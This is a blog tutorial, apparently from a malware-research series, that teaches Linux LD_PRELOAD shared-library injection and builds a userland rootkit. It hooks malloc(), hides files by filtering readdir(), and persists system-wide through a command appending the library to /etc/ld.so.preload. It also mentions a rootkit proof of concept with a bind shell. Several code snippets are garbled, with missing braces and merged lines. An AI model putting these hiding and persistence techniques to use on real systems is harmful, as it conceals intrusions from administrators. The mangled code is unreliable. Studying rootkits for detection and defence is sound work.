Memory Malware Part 0x2 — Crafting LD_PRELOAD Rootkits in Userland
Silence is harder to predict than the noise ×_×
As a person possessive of my beloved operating system, I’ve often wondered if it is being honest with me or hiding stuff that matters (anything that could break my heart). Well, I thought it was a bad liar until the day I came across the world of rootkits. So, here is an article that intends to shed some light into the dark world of rootkits by demonstrating the whole process of injection and execution of malware on behalf of a process. The idea of code injection discussed here is known as SO/Shared Object injection on Linux (analogous to DLL injection on Windows). In this series of articles, we start off with the easiest yet decently effective method of shared library injection in userspace — LD_PRELOAD injection. Later in the article, we will see how this technique can be leveraged to craft a simple userspace rootkit.
- This article continues the previous one and is written assuming a basic understanding of program binaries and the way it turns into a process.
- Understanding of the ELF file format would be helpful but not necessary.
- A basic understanding of the Linux command line is assumed.
- The article is aimed at guiding beginners (having little or no knowledge about malware) to keep their first foot into this territory. So, nothing as much as endless curiosity and hunger to learn is required.
ROOTKITS — Into the darker world
A rootkit is some software that may work independently or cooperatively with some other malicious code to conceal its presence as well as any malicious activities. It is usually intended to conceal the existence of files, directories, logins, processes, remote connections and any malicious activity intended by its payload.
How does a regular user or a system administrator usually look for a process (legitimate or malicious) on a system — by invoking some program like task manager or perhaps ps (on Linux). Internally, these programs leverage shared library functions which further perform system calls (services offered by operating system) to perform a task. Well, a rootkit intends to make these programs lie to its audience (a system administrator or perhaps a regular user).
Sheesh, how could it possibly do that ?
Suppose we write a simple program that uses printf() to print a “Hello hell” to the console. On Linux, printf is a function offered by the standard C library — libc.so.
When the program program runs, it calls printf() which internally performs write() system call writing “Hello hell” to the console. Performing syscalls is actually a way of asking the operating system to do some a certain something on behalf of the user-program. If a rootkit is somehow able to intercept these calls from a program (see Evil hook in above picture), it will entirely control the code flow of a program. Although, it has vast capabilities of performing malicious intentions yet they are specifically designed to hide themselves and their malicious activities.
NOTE : This article will focus on rootkits in user space which won’t have direct access to all the resources like memory, peripherals and other hardware.
To be able to successfully hook (or intercept) system calls, rootkit must be present inside the kernel space (after all system calls just services offered by operating system). Similarly, to be able to intercept shared library calls, rootkit must be present inside the process address space of an executing program. If getting into memory is the only step keeping us from hooking I guess we know what to target ^_^
Dynamic Linker — An Innocent Smuggler
Dynamic linker or program interpreter is the one responsible for loading all the dependencies (present in the form of shared libraries) and hot-patching the program image before transferring control to the program’s entry point. On Linux, there are 3 legitimate approaches to load a shared library (SO binary) into the program’s address space —
- The dlopen API has the dlopen() function that loads a shared object into calling process’s address space (analogous to LoadLibrary() on Windows).
- Entries specified as DT_NEEDED in dynamic section of the ELF binary are loaded as dependencies by dynamic linker prior to program execution. It serves as another interesting infection point in the world of ELF virus known as DT_NEEDED infection (which is out of scope for this article but will hopefully be covered later in disk-based infections of Malware Engineering series).
- Setting up LD_PRELOAD environment variable with the shared library to be loaded.
Searching for Shared Library function
When a shared library function( ) or an external symbol (symbols defined outside the program) such as printf() is called by any program, the dynamic linker starts its search from the very first loaded SO. It starts by parsing its symbol table, if it finds any symbol by the name of printf, it uses the definition provided by that SO, if not it hops onto the next loaded SO and so on until it finds one. In this way a shared library that happens to be loaded first can override the functionality of subsequent loaded shared libraries.
$ LD_DEBUG=symbols ./demo
22632: symbol=printf; lookup in file=./demo 
22632: symbol=printf; lookup in file=/lib/x86_64-linux-gnu/libc.so.6 
(output emitted for brevity)
By setting the environment variable
LD_DEBUG=symbols , we can analyse how a dynamic linker resolves symbols at runtime. According to the output below, it first checks if printf is a symbol internal to demo (the program itself), after which it starts finding it in loaded dependencies (in this case its the standard C library — libc.so.6).
Dear LD_PRELOAD, can you do me a favour ?
Behaviour of dynamic linker can be influenced by setting up environment variables. Setting up LD_PRELOAD environment variable is a legitimate way of asking the dynamic linker to load the specified SO as a dependency before loading any other shared library into the process address space of invoked program. This has the effect of overriding the functionality of library functions.
Let’s try overriding the functionality of
malloc() (defined in
libc.so) by our own shared library (
librootkit.so). We start by writing a function by the same name — malloc() having the exact same prototype as libc’s malloc(). Our malloc() implementation does nothing more than printing a string on STDERR using fprintf().
// librootkit.c : Defines an attacker's implementation of malloc()define _GNU_SOURCE
#include <stdio.h>void *malloc(size_t size)
fprintf(stderr, "\n\t[-x-x-x-] Hijacked libc's malloc(%ld)\n\n", size);
Let’s create a file named
innocent.c that performs a call to
// innocent.c : Performs a call to malloc().#include <stdio.h>
#include <unistd.h>int main()
char *alloc = (char *)malloc(0x100);
strncpy(alloc, "Sync your chakras\0", 18); fprintf(stderr, "\n\n[+] malloc() returned - %p \n\n", alloc, alloc);
NOTE : Do not use printf() or fprintf(stdout, …) inside Librootkit.so yet as they internally performs a call to malloc(). This could turn out to be a problem later.
We use GCC to compile the shared library —
./innocent, we get the intended output. Seems like malloc() did its job well !
/usr/bin/ldd script, we can list all the dependencies of
innocent program which happens to be
libc.so.6 and the dynamic linker itself (
/lib64/ld-linux-x86–64.so.2) in this case.
linux-vdso.so.1 or vDSO (virtual Dynamic Shared Object) used for optimisation of frequently used system calls is small SO internally used by the C library and can safely be ignored for now. (see
$ man 7 vdso)
$ ldd ./innocent # before setting LD_PRELOAD
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc5abf5b000)
Now, we export LD_PRELOAD environment variable and see the changes in dependencies of
./innocent program using
$ export LD_PRELOAD=./librootkit.so
$ ldd ./innocent # After setting LD_PRELOAD
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f542e0a6000)
There is an extra line of ouput now indicating that
./innocent program has another dependency named —
./librootkit.so (0x00007f542e497000). Let’s run
Clearly the output indicates that librootkit.so’s implementation of malloc() is invoked by the dynamic linker which overrides libc.so.6’s version of malloc(). It seems like we successfully hijacked a libc.so function but it returns a NULL pointer value which when dereferenced by the
./innocent program causes a crash (Segmentation fault). Crashes are too noisy !
To be able quietly execute the rootkit payload, we need to return a value that the originally called function would have returned. We have 2 ways to solve this issue —
- Our malloc() function should implement the libc’s malloc() functionality as asked by the user. This would eliminate the need for libc’s malloc() entirely.
- Librootkit should somehow be able to call the libc’s malloc() and return the results to the calling program.
Since we are lazy, we decided to use the libc’s malloc(). But whenever we invoke malloc(), the dynamic linker calls for librootkit.so’s version of malloc() since it the first occurrence of malloc(). But, we want to call for the next occurrence of malloc(), i.e. the one present libc.so.
This happens because the dynamic linker internally uses dlsym() (present in
/usr/include/dlfcn.h header file) to find the address of a symbol loaded into memory. The default handle provided as first argument to dlsym() is RTLD_DEFAULT, which returns the address of the first occurrence of symbol. However, there is another handle — RTLD_NEXT that searches for the next occurrence of the symbol. Using this we can find the libc.so’s malloc() !
- Line 9 : This declares a function pointer original_malloc initialised to NULL. It will store the address of libc.so’s malloc().
- Line 11 — 26 : This is a hook having the same type for return value and arguments as that of libc’s malloc(). It should externally look the same as libc’s malloc to get dynamic linker into believing that it is the one intended to be called by the user.
- Line 13 — 14 : If original_malloc is NULL (i.e. the hook is not yet called even once), call dlsym() with RTLD_NEXT explicitly specifying to find the address of next occurrence of “malloc” after (or with reference to) the current object (librootkit.so). After the call, original_malloc stores the address of libc’s malloc().
- Line 16 — 19 : This contains the payload of the rootkit. Any good or evil comes here.
- Line 21 — 25 : It then calls for the original_malloc(), allocating size bytes on heap segment and returning the base address of allocated bytes to the calling program.
Testing librootkit.so, we get our code executed with a clean departure of the program. Both attacker as well as the user is now happy due to different reasons, this is business !
Librootkit.so — Hide me away !
Ultimate aim of a rootkit is to hide itself and the malicious activities performed by its payload. Let’s see how we can hide Librootkit files.
To be able to hide a file, we need to analyse and understand how a program like
/usr/bin/find searches for a file on system. We can trace all the library calls performed by a program via
/usr/bin/ltrace program. Let’s use it on /bin/ls.
critical@d3ad:~/EVIL_RABBIT/demo$ ltrace /bin/ls
readdir(0x55849512a9d0) = 0x55849512aa20
strlen("librootkit.c") = 12
fwrite_unlocked("librootkit.c", 1, 12, 0x7feb8fbf6760) = 12
(output emitted for brevity)
+++ exited (status 0) +++
It uses opendir(), readdir() and closedir() declared in
/usr/include/dirent.h header file to list the content of any place in the filesystem. The opendir() returns a directory stream, readdir() returns a directory entry pointer whereas the closedir() closes the directory stream.
Here, readdir() takes in a directory pointer and reads a directory entry. It returns a pointer of type
struct dirent * which has a member called d_name. The d_name member is a character array of 256 bytes storing the name of directory entry. This is the name which we see as output of /bin/ls. However, it returns NULL if the end of directory stream is reached and errno is not changed. With this information in hand, our aim is to skip some specific directory entries to hide our files.
- Line 8 : It defines a macro HIDE_ME which is the file we want to hide. Currently the rootkit hides itself.
- Line 11 — 17 : Same as we did with malloc().
- Line 20 : We call original_readdir() to get a directory entry.
- Line 22 — 23 : It checks if directory entry is not NULL and calls strncmp() to compare if the d_name member of the directory entry is same as HIDE_ME (i.e. “librootkit”). If the both the conditions are true, it calls the original_readdir() to read the next directory entry thereby skipping all the directory entries whose d_name starts with “librootkit”.
- Line 25 : It returns a directory entry to the calling program.
Running a program with preloaded shared library “librootkit.so” results in hiding all files and folders having their name started with “librootkit”. Below is the proof of concept.
Preloading with every damn process
To get yourself loaded with every process on the system, there is a need to go beyond setting up environment variables. There is a file /etc/ld.so.preload which is consulted by the dynamic linker every single time it executes a program. This file should contains whitespace-separated list of ELF shared objects to be loaded before the program. (read
$ man ld.so)
innocent innocent.c librootkit.c librootkit.so$ echo $PWD/librootkit.so >> /etc/ld.so.preload
Just a word of warning !
Ask yourself again if you really want to get involved with this file. Adding a SO path to /etc/ld.so.preload has a system wide effect. You may loose your beloved operating system if anything goes wrong with your hooked function (anything like a segmentation fault in libc’s readdir()) since the dynamic linker, whose functionality is getting subverted is the one responsible behind runtime linking of all the processes system-wide. I hope your decisions are wise.
Below is an a visual representation of how the code flow changes in presence of an evil hook.
You may also want to have a look at EVIL RABBIT — mere POC of a usermode rootkit hiding its presence and backdooring the system with a TCP Bind Shell.
Limitations and Detection
Although this technique is decently effective as a userland rootkit, yet it should not be considered as some benchmark for code injection techniques mainly because it lacks stealth and partially because it requires a new process to be created (or to restart an existing process). Also —
- It does not get triggered by statically compiled programs (although there are just a few to be seen) as they do not contain dynamic sections and hence doesn’t require runtime linking.
- It is easy to detect, I mean simply listing the SO dependencies via /usr/bin/ldd (a BASH script), one can see the malicious shared library getting along with every program.
- Hijacking function calls to conceal its existence seems to be less effective if an application is retrieving data via direct system calls .
The reason I still wanted to cover it was because it serves as a good first foot into this area. In the next article of this series, we will be discussing process injection, i.e. code injection in already running programs.
DISCLAIMER — The techniques described in the article series promotes malware research and should only be used for educational purposes. Don’t risk yourself by using it for malicious purposes, it might attract hell. Try to keep the world a safe place ×_×
Connect on Linkedin